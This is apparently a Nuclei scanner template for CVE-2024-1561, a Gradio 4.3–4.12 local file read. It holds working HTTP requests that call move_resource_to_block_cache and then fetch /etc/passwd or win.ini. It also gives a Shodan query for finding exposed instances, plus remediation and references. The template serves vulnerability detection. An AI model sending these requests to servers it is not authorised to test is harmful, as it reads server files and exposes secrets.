id: CVE-2024-1561 info: name: Gradio 4.3-4.12 - Local File Read author: nvn1729,Diablo severity: high description: | Local file read by calling arbitrary methods of Components class between Gradio versions 4.3-4.12 impact: | Successful exploitation of this vulnerability could allow an attacker to read files on the server remediation: | Update to Gradio 4.13.0 reference: - https://huntr.com/bounties/4acf584e-2fe8-490e-878d-2d9bf2698338 - https://github.com/DiabloHTB/CVE-2024-1561 - https://nvd.nist.gov/vuln/detail/CVE-2024-1561 - https://github.com/gradio-app/gradio/commit/24a583688046867ca8b8b02959c441818bdb34a2 - https://www.gradio.app/changelog#4-13-0 - https://www.horizon3.ai/attack-research/disclosures/exploiting-file-read-vulnerabilities-in-gradio-to-steal-secrets-from-hugging-face-spaces/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2024-1561 cwe-id: CWE-29 epss-score: 0.00087 epss-percentile: 0.36659 metadata: verified: true max-request: 2 shodan-query: html:"__gradio_mode__" tags: cve,cve2024,intrusive,unauth,gradio,lfi,lfr http: - raw: - | POST /component_server HTTP/1.1 Host: {{Hostname}} Content-Type: application/json {"component_id": "1", "data": "{{path}}", "fn_name": "move_resource_to_block_cache", "session_hash": "aaaaaaaaaaa"} - | GET /file={{download_path}} HTTP/1.1 Host: {{Hostname}} extractors: - type: regex part: body name: download_path internal: true group: 1 regex: - "\"?([^\"]+)" payloads: path: - c:\\windows\\win.ini - /etc/passwd stop-at-first-match: true matchers-condition: and matchers: - type: regex part: body regex: - "root:.*:0:0:" - "\\[(font|extension|file)s\\]" condition: or - type: word part: content_type words: - "text/plain" - type: status status: - 200 # digest: 4b0a00483046022100d26a144630e68bc8d64abcccd82c53e14154407cbcf7058289120c90ce084843022100ad2abb54f6a71476ef38fc22bad77ecafebbd737a9c4e6ee6393d9b248ac30cb:922c64590222798bb761d5b6d8e72950